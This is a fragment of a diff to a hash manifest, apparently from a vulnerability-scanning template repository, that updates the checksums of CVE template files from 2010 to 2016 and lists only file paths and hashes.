-http/cves/2010/CVE-2010-4239.yaml:c4050ca6a9a1ba60621e66783f85213759b64d96 -http/cves/2010/CVE-2010-4282.yaml:a6a60700c9e220d86947b9b5bf65cedc3839e03a +http/cves/2010/CVE-2010-4231.yaml:95061e8a83ae97b5bc5f257526742084ee228267 +http/cves/2010/CVE-2010-4239.yaml:70dfd38979f322a9c84edfc3f3439c7e6eaca447 +http/cves/2010/CVE-2010-4282.yaml:eca8fb47c4f137ee769a8ce8170e5feea53475c0 http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 http/cves/2010/CVE-2010-4719.yaml:6c0dc775334d3f436a198b83d84a98acf172da6a http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 -http/cves/2010/CVE-2010-4977.yaml:9e5b7253a99c393814e0f3cfbd27992dfa336274 -http/cves/2010/CVE-2010-5028.yaml:0ffbc4395e4046ada43652a0e0fa672cdad14a7c -http/cves/2010/CVE-2010-5278.yaml:8a60614e73e0cf3b1ffbb76269b13b7921535de6 -http/cves/2010/CVE-2010-5286.yaml:ccf9698bf9602866e9d6b800f766c5a9c893ebb9 -http/cves/2011/CVE-2011-0049.yaml:a13d91484a5b80a35520ea575a0c4032deb34b57 +http/cves/2010/CVE-2010-4977.yaml:44aade6d6155014fe33a8ec57e7898212331104e +http/cves/2010/CVE-2010-5028.yaml:c396646a343f1230675d7db4de16eaf675e26e7a +http/cves/2010/CVE-2010-5278.yaml:4b551326a6f84dc58285d03101811b8ae002aba8 +http/cves/2010/CVE-2010-5286.yaml:992dcc1f927e19df7e91041994ebba411d0c287b +http/cves/2011/CVE-2011-0049.yaml:d4ae5f76935775886bf63bfac0a0ea93947e3a74 http/cves/2011/CVE-2011-1669.yaml:b790ebc1bb9519722ffd34b342f8d4eca798ecb2 -http/cves/2011/CVE-2011-2744.yaml:03ab85cc38bad602f3bae9309d6d9e94a3ef8ca6 -http/cves/2011/CVE-2011-2780.yaml:509b32f8c34ec3ac54c7f5d68eca51c8d420f68f +http/cves/2011/CVE-2011-2744.yaml:e75a2a3b77597ee4b6eadb57cc5a878859099de0 +http/cves/2011/CVE-2011-2780.yaml:cd61fcc85be0dd1ad856d5d42c1b0d8becf32ca5 http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 -http/cves/2011/CVE-2011-4336.yaml:304c44d51a1936102439ea5d3b93753c3048e0ae +http/cves/2011/CVE-2011-4336.yaml:da0baea9d73290dee0d3ed225841560e1736a9a3 http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae http/cves/2011/CVE-2011-4624.yaml:67aec04578dce4d171c7e6a30f6101a4f35537d8 -http/cves/2011/CVE-2011-4640.yaml:a420fc3b17a88aa376e17b9aeeececfcb7a85698 -http/cves/2011/CVE-2011-4804.yaml:b834bce15f99648a9aa69e020e115d9d1743ef0f -http/cves/2011/CVE-2011-4926.yaml:07d0e425cd96d336ea822358a49ff41821a63c3d -http/cves/2011/CVE-2011-5106.yaml:2f518834abd8cddb17b5116bb85f009ddf8cddc2 +http/cves/2011/CVE-2011-4640.yaml:92182b7d6ce6e598ba082f300a2d3fcb7a81c381 +http/cves/2011/CVE-2011-4804.yaml:5f7d69e922d525bcaed5e0f3363e99abb1742866 +http/cves/2011/CVE-2011-4926.yaml:4623078a9e2f41dcb7faab66c37f210c2ace9e21 +http/cves/2011/CVE-2011-5106.yaml:f411f9f73e789680f95b18aced081d080c822470 http/cves/2011/CVE-2011-5107.yaml:6500479dea5a2baa7dda98cf15ac603c80dd88ee http/cves/2011/CVE-2011-5179.yaml:6b1bc0308f5843e6e8214c7689ed7ce2cdd3d067 -http/cves/2011/CVE-2011-5181.yaml:2c742ddf13d80ab9705095f5c04863acf5effc53 +http/cves/2011/CVE-2011-5181.yaml:da332c9c71b49255b7372933d6e043a6ef920e0f http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:3629299c7ab9174df7d8588184536146bc4c9aaf -http/cves/2012/CVE-2012-0392.yaml:e4a19a213ec6890934b32339c1bc1a595f3c5f7e -http/cves/2012/CVE-2012-0394.yaml:3111ae42d043d8619a922208aaa998cae6f28b86 -http/cves/2012/CVE-2012-0896.yaml:6d15a7d9bc6d3be722d5d4ed979998577d8b9ed4 -http/cves/2012/CVE-2012-0901.yaml:cc4676f6b8f1025af8450441cc345d61d191097c -http/cves/2012/CVE-2012-0981.yaml:54410413b227a7979de56f35b31dc2e865f07676 -http/cves/2012/CVE-2012-0991.yaml:08d3cf09600f775ce531adf5e966547525d8b4dc -http/cves/2012/CVE-2012-0996.yaml:84b125282e0096629de4adacc5b9b6e1db7234f3 -http/cves/2012/CVE-2012-1226.yaml:b9aefa26324f852d4d716dbb330845b0d557b935 -http/cves/2012/CVE-2012-1823.yaml:1bc5e1ca0c4b8fbd5170219da23eaacbbd4f5bac -http/cves/2012/CVE-2012-1835.yaml:9ef03cd62c044d41781e930a335d6ea02ebc71dd -http/cves/2012/CVE-2012-2371.yaml:d35fa4dae38879bc87e8c1927beb360c6ca07940 -http/cves/2012/CVE-2012-3153.yaml:4f5f8dd92c3bb79b73f5e096b157fa434d06dade +http/cves/2011/CVE-2011-5265.yaml:ef1fc0051980989f0fa31ae918c337a47a442db4 +http/cves/2012/CVE-2012-0392.yaml:7c64dbe978e836fc59f6fe89079f873f75b1721a +http/cves/2012/CVE-2012-0394.yaml:3ab9ca9bbcc1d4b09c6bedef8f16cac4046daca9 +http/cves/2012/CVE-2012-0896.yaml:6498f3a54562aa157b18d08b02019ba3e358abf4 +http/cves/2012/CVE-2012-0901.yaml:546493d6d7a6c219656b5977b297de328c74dfe4 +http/cves/2012/CVE-2012-0981.yaml:4fb0cb2ce3a9d97e83dfa0d6a57bf66a7c22ea01 +http/cves/2012/CVE-2012-0991.yaml:eaced68f949dc463ae65022d791fe72f15da690b +http/cves/2012/CVE-2012-0996.yaml:891c0651137f2e947c6b1b9e438cba3edb33ec77 +http/cves/2012/CVE-2012-1226.yaml:3de9396fb896c545ce2f8e8a121e0203565bc963 +http/cves/2012/CVE-2012-1823.yaml:da276ae6c59ea82eb9dee085c7bc8f3e6de4f7df +http/cves/2012/CVE-2012-1835.yaml:4dfa20f76fbaab9369e068c7e768b62db01016cb +http/cves/2012/CVE-2012-2371.yaml:010260ccc1dec8ac14c6288bfe9789c28817fed5 +http/cves/2012/CVE-2012-3153.yaml:7745803a79c081e0d4cf1ab008315da194440504 http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 -http/cves/2012/CVE-2012-4242.yaml:5702dfb9eb0dc70a806354645d5581b711c44aff +http/cves/2012/CVE-2012-4242.yaml:c0f6cf73a75459db549d052fc5621421c16c07e1 http/cves/2012/CVE-2012-4253.yaml:b751e39074389ddfe21a53c9639721af4366933d -http/cves/2012/CVE-2012-4273.yaml:ea232cd1dac8f5f9395da88bf4af057aa5df281f -http/cves/2012/CVE-2012-4547.yaml:1a368b287bf2d7a5cf4e2a8bb2262c9947e345a8 -http/cves/2012/CVE-2012-4768.yaml:816e62117eca9cae9747d85abe513b4c74bb6245 -http/cves/2012/CVE-2012-4878.yaml:adab7b06d1898a824aeb36aedbb3e8ed3794be18 -http/cves/2012/CVE-2012-4889.yaml:5508ad452b4b356da8b934e6de9abc1deae05be4 +http/cves/2012/CVE-2012-4273.yaml:f257338bd89ce77ac23d22e5beb22d089492fd2b +http/cves/2012/CVE-2012-4547.yaml:b5596c4a4096d71d32c140095bcc319dfdbfa17a +http/cves/2012/CVE-2012-4768.yaml:21af07fadcfe0dc640ce7ff9d1f4a1b228fdc86a +http/cves/2012/CVE-2012-4878.yaml:1ef5a93dda472a401d0e59d4e7e8382441ef842c +http/cves/2012/CVE-2012-4889.yaml:9e23549c59a9109c5c9e1a4ad29fc0537cc59037 http/cves/2012/CVE-2012-4940.yaml:0788c7af85578fd5462ba3646fe3a489281a3326 -http/cves/2012/CVE-2012-4982.yaml:defe2c394ce76e59123751467989546fdedb477b -http/cves/2012/CVE-2012-5321.yaml:c3c959cd4139018f9dc6d83e0dd48e9ceb5d40cb -http/cves/2012/CVE-2012-5913.yaml:d1292669a7ac4def883f124182b062b202023751 -http/cves/2012/CVE-2012-6499.yaml:44bcad77ce9332946506dce70c593c7407df4982 -http/cves/2013/CVE-2013-1965.yaml:9f5ea4e2ede3e57a760b78bba35df5a25f97b096 -http/cves/2013/CVE-2013-2248.yaml:0f5c75886160f8c45398025d59c33a09cc7555ff -http/cves/2013/CVE-2013-2251.yaml:6451e30038014299e998aa93b46bd63d7b6cef90 -http/cves/2013/CVE-2013-2287.yaml:740ca6d675d5d036e8bb8c442b401f100cd192e1 +http/cves/2012/CVE-2012-4982.yaml:fa88c9844f314ec9df1cd44e460349e3a059cc03 +http/cves/2012/CVE-2012-5321.yaml:36fde02c90c4dbe92b7e3b91a097fdc47ea72622 +http/cves/2012/CVE-2012-5913.yaml:5879951c8bd0c95f891b1d4d905fdb30a58514a7 +http/cves/2012/CVE-2012-6499.yaml:ad1f16e453fb178d32bfe6d97ec0c43da94f89c5 +http/cves/2013/CVE-2013-1965.yaml:420bbbd2807e0e9ca792eca0b3276c4e9f33d532 +http/cves/2013/CVE-2013-2248.yaml:e57458e18f8bf89c1c94678413ff15e8770afd60 +http/cves/2013/CVE-2013-2251.yaml:8eb669224beb43e0a5fb9ccc459495b67b116a01 +http/cves/2013/CVE-2013-2287.yaml:eb52bfef9137b46e70a13c0fd474d1f0dd2d4656 http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:f1bb7a19ec36fb857d7b3e9e40c311b35b8dee10 -http/cves/2013/CVE-2013-3827.yaml:b455050804bef00178fe71c47df37e560c227d62 -http/cves/2013/CVE-2013-4117.yaml:e3af3d8b6e5aa118193d40d0111ce652f62807c3 -http/cves/2013/CVE-2013-4625.yaml:708eebdc6371b8866230b4dbfb68d3bf21b09d12 +http/cves/2013/CVE-2013-3526.yaml:053fb4c1ba82c992e5006914d806c5f7ad89c591 +http/cves/2013/CVE-2013-3827.yaml:bb6196380c0971025f32a3bb62ab1262fc1feda6 +http/cves/2013/CVE-2013-4117.yaml:507a06ea58b71624b0c31c362506ee171b939391 +http/cves/2013/CVE-2013-4625.yaml:3b0e121cf1eb47258d888c4ecdd220790a2d2514 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea -http/cves/2013/CVE-2013-5979.yaml:827c8db3d7998dd30cd139dc39662de36bc7199d -http/cves/2013/CVE-2013-6281.yaml:43b0fc6630c8c1c343d4028c0408d9266c4d6025 -http/cves/2013/CVE-2013-7091.yaml:3edf95098b7b7bb53891943a708eddd26a2f5f26 -http/cves/2013/CVE-2013-7240.yaml:b4bd306b198efb89e46f6d280ea28dc091c9da7f +http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 +http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e +http/cves/2013/CVE-2013-7091.yaml:e238a53f639eb74a475752c5356e01e1150f95fc +http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 -http/cves/2014/CVE-2014-1203.yaml:af8b996d5f9e2adcac4ac435e1654d25e613e918 -http/cves/2014/CVE-2014-2321.yaml:df3f2c107beedfa4774501d2ce5ce1d221fa4ebb -http/cves/2014/CVE-2014-2323.yaml:af8806fdc853257647a4aee490070ec3e11e10ee -http/cves/2014/CVE-2014-2383.yaml:c0890d0099e9e4c4423d441cba21b8da5bf5517f -http/cves/2014/CVE-2014-2908.yaml:34b60804ce981f9c823e9e19caca4e269ba43c8f -http/cves/2014/CVE-2014-2962.yaml:3a364924dde5e4bd3e97684264d29dcd87e502c4 -http/cves/2014/CVE-2014-3120.yaml:f50d3f474c4bb0dbd656c57a48ba61e849486e8c +http/cves/2014/CVE-2014-1203.yaml:bc7a244f362f0b83439d56e3f0636e12843082e6 +http/cves/2014/CVE-2014-2321.yaml:94942212b37b470e8b83b342b8e460e1d10d631f +http/cves/2014/CVE-2014-2323.yaml:d86924b53ca183f55225f54739588683b7fd8b98 +http/cves/2014/CVE-2014-2383.yaml:d7ab3d6309e5ac9d06941842603e42cc5ac47e4d +http/cves/2014/CVE-2014-2908.yaml:d3abb494ed31a8fe1ba4417c33341523a40a8063 +http/cves/2014/CVE-2014-2962.yaml:53fac318582c4e243b9e5145fce965ed95428f90 +http/cves/2014/CVE-2014-3120.yaml:852e796db8a1ff729eac94d10d725c2d92ca47d7 http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 -http/cves/2014/CVE-2014-3744.yaml:e558b2c745e05e4c0025ceac2405b1252ab07d25 -http/cves/2014/CVE-2014-4210.yaml:1da5b0613ac1f2914cd717a6668459eaed6b923f +http/cves/2014/CVE-2014-3744.yaml:8fd97d3e288c8c134d50e3b670ef5c2ee23dd8df +http/cves/2014/CVE-2014-4210.yaml:4f7ce22b95de4f25135ce21ef24a481440fd3ff7 http/cves/2014/CVE-2014-4513.yaml:f773b0ae252939028612a224507f9815e8af7c49 http/cves/2014/CVE-2014-4535.yaml:5ea240904288e526982f8498a054c0f81060814b -http/cves/2014/CVE-2014-4536.yaml:9a419e33efcbea5baa4f8d653258be1a45b5ac76 -http/cves/2014/CVE-2014-4539.yaml:26b3d086f448e6808ff2d7cc1fcee23ff25dbb31 +http/cves/2014/CVE-2014-4536.yaml:c45991420328d9bcdbb3eaf2aea30726c7c162f8 +http/cves/2014/CVE-2014-4539.yaml:e4078f1d6f7af2ae149936f2a34e9ec6a7047313 http/cves/2014/CVE-2014-4544.yaml:9b348c6784b4e52f72f556420bdeebf266b0c266 http/cves/2014/CVE-2014-4550.yaml:d91b194e084d6abcb57601e52751f8de18ac94d4 -http/cves/2014/CVE-2014-4558.yaml:32ad362633e7f3c89c17684fa2f0add284cce52f -http/cves/2014/CVE-2014-4561.yaml:bb07a47af2690288b49fe39a07dcbda30fb71b2d +http/cves/2014/CVE-2014-4558.yaml:fa8f68a1865e8463aab7b7648d00939186f6d6b2 +http/cves/2014/CVE-2014-4561.yaml:510ee96cb131f1235bcaaed0e70a67fecec141ce http/cves/2014/CVE-2014-4592.yaml:04d3f44b089e28ea1d584bead8b557aee3d12f63 -http/cves/2014/CVE-2014-4940.yaml:6f2d09cfc92e6e1f5624fa66305e6aef9b93c22e +http/cves/2014/CVE-2014-4940.yaml:136ffe1784b6c7bb206c326d2652dcdcaef7552f http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 -http/cves/2014/CVE-2014-5258.yaml:b4097cdbe58cf74d91b4a7249119cb46a186d3d9 +http/cves/2014/CVE-2014-5258.yaml:b25628942848bdd5962b6a5c9e52af5930597f67 http/cves/2014/CVE-2014-5368.yaml:a164c0d868655690541a180330c2ee48979fff2f -http/cves/2014/CVE-2014-6271.yaml:91fe47f1efff2e7850a3a9c8408dcaea4b7fcfa1 -http/cves/2014/CVE-2014-6287.yaml:50e85a0a80464d40fe58430414e03d67b11fce10 +http/cves/2014/CVE-2014-6271.yaml:c336b5b85934da1f43ce4d185e09796b4fd70e4e +http/cves/2014/CVE-2014-6287.yaml:3c4729bdae68ac1479d19f6720fffddbb26d262f http/cves/2014/CVE-2014-6308.yaml:aa88544552c7b66b74ede5bf9e0b134edbf863fa -http/cves/2014/CVE-2014-8676.yaml:72239c99e43a574291bd68fbbd57a06dd9a48555 -http/cves/2014/CVE-2014-8682.yaml:e1307f41692edd23e6751e01190e7cf2dcc6346d -http/cves/2014/CVE-2014-8799.yaml:55e4235f8b2c2d12d78d809d1a9233f6d3049952 +http/cves/2014/CVE-2014-8676.yaml:0cfe4b8a24bcb2b98dd9549cb2d1c39585200dd2 +http/cves/2014/CVE-2014-8682.yaml:dc6b4228d0435ef2d1a27f769cc058c103c914d2 +http/cves/2014/CVE-2014-8799.yaml:e2899a7c8ca8196f7138c225e30af40dbef8fd05 http/cves/2014/CVE-2014-9094.yaml:13aebc2fd2c559c5ee127d7c8ddc0dbb681c84fd http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:15dcee27c96bb39f779c55321c7d133b3a4a11f8 -http/cves/2014/CVE-2014-9444.yaml:8c4ab8aa355b6feda6e04a50176a12666a8e1a66 -http/cves/2014/CVE-2014-9606.yaml:74cc1154e0374f962b3962f9f1ae08cacd632aff -http/cves/2014/CVE-2014-9607.yaml:bae4ee40ea38adab99256ff8810f842a528a02a4 -http/cves/2014/CVE-2014-9608.yaml:a3dffef6553a16a35bd4080bb9c255a1c6dfbeb3 +http/cves/2014/CVE-2014-9180.yaml:9efe6be2df197e7bc5265ad0eaf75f897a69f63a +http/cves/2014/CVE-2014-9444.yaml:f33dc2ffea4e7307bfd997daad8cd6bccc82d266 +http/cves/2014/CVE-2014-9606.yaml:b85356b15dad93b20df3cc8884e727d57733b88c +http/cves/2014/CVE-2014-9607.yaml:bfc63136609830a20e576b4a70729a9706e1c841 +http/cves/2014/CVE-2014-9608.yaml:fe1ccade7e14225244050e5e08033f7968d697a9 http/cves/2014/CVE-2014-9609.yaml:d421d78b1f69c9f53e2a166d11e80fc8e317204e -http/cves/2014/CVE-2014-9614.yaml:01bdb613d35cf22722197f354d046532e5bc41f7 +http/cves/2014/CVE-2014-9614.yaml:beedd24fb47f14bb6523002f382ad4660a4aff85 http/cves/2014/CVE-2014-9615.yaml:59a97a7e4a3fc7fa230940a4601b02da8b69371b -http/cves/2014/CVE-2014-9617.yaml:acb0b5cab66249f9b07c789cca09d8c1d51488ce -http/cves/2014/CVE-2014-9618.yaml:fbf5a3a378ae96a0f1ebcd2980f3113549c3af6a +http/cves/2014/CVE-2014-9617.yaml:bb4955ef8e4d44b240c4a02c58859327b0cac78e +http/cves/2014/CVE-2014-9618.yaml:608a6fb69d382c773377b69b638a29047c58f77b http/cves/2015/CVE-2015-0554.yaml:d20883db51faac8ddf1fcf4709e557d1967c7485 -http/cves/2015/CVE-2015-1000005.yaml:148ee1bcb93fa4293b5027a83c6cdf252851511b +http/cves/2015/CVE-2015-1000005.yaml:6bbb08fc5f35845e1796eec9f53f682f39a0b7d1 http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb -http/cves/2015/CVE-2015-1427.yaml:2052c433e8cec1bcba0a0c0ab79cae38f82b611d -http/cves/2015/CVE-2015-1503.yaml:505b6ad4223db51a89a64d57d71ea57f610162b9 -http/cves/2015/CVE-2015-1579.yaml:79d36985380867eb86b8493525f4df9c4823b2d9 -http/cves/2015/CVE-2015-1635.yaml:7e86c46c0d912d6b56ce0ca101290f9968b7e2be -http/cves/2015/CVE-2015-1880.yaml:bb7698568401bd95647404819705e35b1e7b9c8e +http/cves/2015/CVE-2015-1427.yaml:2cceec2e205f316b1fc790135f3c66b11075118d +http/cves/2015/CVE-2015-1503.yaml:bc85d23c04ac419bcbe58da76af9d044a52dcfd4 +http/cves/2015/CVE-2015-1579.yaml:52b616d917b5e92f3ab3b1732938e62af4957557 +http/cves/2015/CVE-2015-1635.yaml:791a7cf31afd4b27a3585149cfaadbdc1e953860 +http/cves/2015/CVE-2015-1880.yaml:9def22edba12734986460f999e854217643e7880 http/cves/2015/CVE-2015-20067.yaml:77e222d17ecb3663400b5bb143f2ab56845043b2 http/cves/2015/CVE-2015-2067.yaml:2835680c4edd735249eefa325c2ab2af801136d4 -http/cves/2015/CVE-2015-2068.yaml:c953242135a61e88df9918d88a563f12a78f7a44 -http/cves/2015/CVE-2015-2080.yaml:c8c1355c24f22a98ecd07ff45b5639045ebbf4c9 -http/cves/2015/CVE-2015-2166.yaml:44a883aee08d308103ab096e203af4147fb63c11 -http/cves/2015/CVE-2015-2196.yaml:978724dc54bb9ae4f534a373d87a67d4538e6858 -http/cves/2015/CVE-2015-2755.yaml:82a0a885cb854fa843400aae700b6189febf8341 +http/cves/2015/CVE-2015-2068.yaml:ddfed860ffa4852c598513ec68a14893b264a396 +http/cves/2015/CVE-2015-2080.yaml:b232c65718854a1049244802081c696ecc31eb82 +http/cves/2015/CVE-2015-2166.yaml:2869726e68902758b097a2b7f02925968ef0aeff +http/cves/2015/CVE-2015-2196.yaml:bd31271f82bc747db7d750a1d9890ed09c4192d3 +http/cves/2015/CVE-2015-2755.yaml:ac90343bbd36f1d7328d675ac69317f3ae2a46bd http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 -http/cves/2015/CVE-2015-2807.yaml:a227602f43f63d8af4f98cfaf7357fc6d357224c +http/cves/2015/CVE-2015-2807.yaml:459c579131720fd9cdda80c3d0ef2224c6666b35 http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f -http/cves/2015/CVE-2015-2996.yaml:4301c965d3ce4ee88948b11567c53f0c1f649fc3 -http/cves/2015/CVE-2015-3035.yaml:2ff6416b34c58d2f32282653c0b7b5ae4046814f -http/cves/2015/CVE-2015-3224.yaml:313678c50c664b17121e54cff7095002c666217f -http/cves/2015/CVE-2015-3337.yaml:b2ad45e3260bfa0a8120a1f1c0395d06faae88b4 +http/cves/2015/CVE-2015-2996.yaml:24c0c2213add5edba15d035eb9690636f24e3999 +http/cves/2015/CVE-2015-3035.yaml:b4346900d07331df73e331062ff50d71b17b221c +http/cves/2015/CVE-2015-3224.yaml:f1b418ea3923fe6ce83982865ea6a8f4196b23fe +http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:7e151eb750e3c1602ea9cb1aa3e9a2d68ca31770 -http/cves/2015/CVE-2015-4050.yaml:1fb6c88775ea0bb6994b2e298ee5c8b73719e3c3 -http/cves/2015/CVE-2015-4062.yaml:378f403ff95aa7bee5c65579e5d754b97e63e3e7 +http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 +http/cves/2015/CVE-2015-4062.yaml:8c16e8680fcb2c9c9a9cea48e3dfac365c09fdcd http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 -http/cves/2015/CVE-2015-4074.yaml:b5d68e8c21d90b492949a026199011ffa9b7ccb4 -http/cves/2015/CVE-2015-4127.yaml:07a76d863355591fa4bf3161356ac8edebe9ca97 +http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 +http/cves/2015/CVE-2015-4127.yaml:7a03956081adf3e4490a32ad4fbb5cba1dab766f http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:891c495387a931870d0ceec861fc320c8b076967 -http/cves/2015/CVE-2015-4632.yaml:834457ecf87f6fbc2957118f24eab2f08a922f39 -http/cves/2015/CVE-2015-4666.yaml:d75fda264bca4227d5bed4d82da1aaf9a958c8ae -http/cves/2015/CVE-2015-4668.yaml:a7fd56350c28d37828eb15704a45a4b5d57bf11b -http/cves/2015/CVE-2015-4694.yaml:c66194043edff2b0b26162c69fb40f5245877588 +http/cves/2015/CVE-2015-4455.yaml:a763c5deb0c742232e489d143dd154c0ea2b4fa0 +http/cves/2015/CVE-2015-4632.yaml:8b2f1aa45ef9876de13f529f40b0ad7698ab1dc8 +http/cves/2015/CVE-2015-4666.yaml:4ce784f10bfa966a6f5ecf859b9a80850a6c2aae +http/cves/2015/CVE-2015-4668.yaml:7b1b38f3c97bb09484a822df734f429e136deed9 +http/cves/2015/CVE-2015-4694.yaml:fb0332f2f71695e7eaea56de97197ef7924b5fcc http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 -http/cves/2015/CVE-2015-5461.yaml:98d8eb40f34b8c6d6d603dd8078a68d86a896f90 +http/cves/2015/CVE-2015-5461.yaml:ccdf5da24f86d86ab0916171941d351a5ebcc120 http/cves/2015/CVE-2015-5469.yaml:993b7db9108784f0a7abb12ef8b33c5d5c1cc68e -http/cves/2015/CVE-2015-5471.yaml:f73d747097f7021c3ea779182d4317198dfadbbd -http/cves/2015/CVE-2015-5531.yaml:f860f8459f55bfea5bf44d5317a66012a44970dc -http/cves/2015/CVE-2015-5688.yaml:dfdad41c83a97739b7002798c9614018919b5c4f +http/cves/2015/CVE-2015-5471.yaml:b4ab394eb025425254e020ef76d91a62d84c88af +http/cves/2015/CVE-2015-5531.yaml:7298c9d71d9bfe34269c16623a7676de7fc6fd09 +http/cves/2015/CVE-2015-5688.yaml:b4a080196c1edcc203a9c220392daaa98837e7ed http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 http/cves/2015/CVE-2015-6920.yaml:010bca7f3c3d63174ad513216c778c12be764930 -http/cves/2015/CVE-2015-7245.yaml:d7c4caa6aebd858813b48f504170ead93f76c97e -http/cves/2015/CVE-2015-7297.yaml:479397b821556af05d4883e6dec21032e5fa5c7b -http/cves/2015/CVE-2015-7377.yaml:056f3a75cc766de47884ee47bc3475d52de4c5dc -http/cves/2015/CVE-2015-7450.yaml:6fa68acdf9f9b816bc885ea187a929c5f0e1f201 -http/cves/2015/CVE-2015-7780.yaml:158102b86a2ba04cff932be068374b3aa67377c4 -http/cves/2015/CVE-2015-7823.yaml:419b139acb8649df87f9fbdd151b5a4a23674e2f +http/cves/2015/CVE-2015-7245.yaml:f5ff558dc2e6aaf7c6fddea351eef15b0fc314b0 +http/cves/2015/CVE-2015-7297.yaml:cba00035af3c1fdb376e38b8f87019b2d7c0b9f6 +http/cves/2015/CVE-2015-7377.yaml:91d20f0b6f6c80a103811c9c813ae2d8c9c6f766 +http/cves/2015/CVE-2015-7450.yaml:d31f750f627aa509eb258c5cfa04016818a1aba6 +http/cves/2015/CVE-2015-7780.yaml:19bbe0743719cd540cad1b1410f9530780893a6f +http/cves/2015/CVE-2015-7823.yaml:1d3cfb653a6a3c4f3215e29c1fa33b7ec523c5a6 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:88082e1686fa05ae008feb2f2d6a0eeba15d8696 -http/cves/2015/CVE-2015-8813.yaml:7c2d2a8feb91d0c4eb7f5133a631276db24e318a -http/cves/2015/CVE-2015-9312.yaml:19fbaca553a825f2ff06036d499b163f79994c04 -http/cves/2015/CVE-2015-9323.yaml:e764a97924ed55cb99181149860192850ef709e2 +http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f +http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 +http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc http/cves/2015/CVE-2015-9414.yaml:44f53443a463d463c575726eec3ff5192b2bcb27 -http/cves/2015/CVE-2015-9480.yaml:76d467ff7bdd50d5b4b0c6eb8735888258d83aec -http/cves/2016/CVE-2016-0957.yaml:6a4aceb98204ef9b710851d91fde84365704e013 -http/cves/2016/CVE-2016-1000126.yaml:77ea357d95ad88637f6db5ead04573a8af9dcbaf -http/cves/2016/CVE-2016-1000127.yaml:5d4c49411b8f59c68c53286b173ebec38363dbbc +http/cves/2015/CVE-2015-9480.yaml:70993e12643bcf8303d221fa8475aff4a9c0c1de +http/cves/2016/CVE-2016-0957.yaml:2e39ae03a9d122b13acb44740c3f74563d68e089 +http/cves/2016/CVE-2016-1000126.yaml:d820a62f82342e8c68f0b56000bcfb1d3ee196ff +http/cves/2016/CVE-2016-1000127.yaml:79570d7e9d206139992c889d1f314c8cd58b437a http/cves/2016/CVE-2016-1000128.yaml:42f74b0e57adf59effe7e114152a36202d61eb6c http/cves/2016/CVE-2016-1000129.yaml:6a9354109374ffdb6807cff25eb83aaebb9e58a2 http/cves/2016/CVE-2016-1000130.yaml:1f43e1aba00fb7e7bb30af51d831b340e5ab6ba2 -http/cves/2016/CVE-2016-1000131.yaml:3308d2f197f8ef3f8f816b639c48c668ab67ea58 +http/cves/2016/CVE-2016-1000131.yaml:f447ecc5dc9268216d688e5bb54dc08e9821e892 http/cves/2016/CVE-2016-1000132.yaml:cbe226168be37f3644a070a0dd06f39419676b95 -http/cves/2016/CVE-2016-1000133.yaml:543a1628eed4a70ef1bda756d2a452e184632e0a +http/cves/2016/CVE-2016-1000133.yaml:781637a2b99455aaa3cef306979240fa8d66faed http/cves/2016/CVE-2016-1000134.yaml:09dbf84e0e4ddff69119ae612f2cdf3f21c7675f http/cves/2016/CVE-2016-1000135.yaml:5984d6af6ad7e94cd4dcf61907054f9dfd449c96 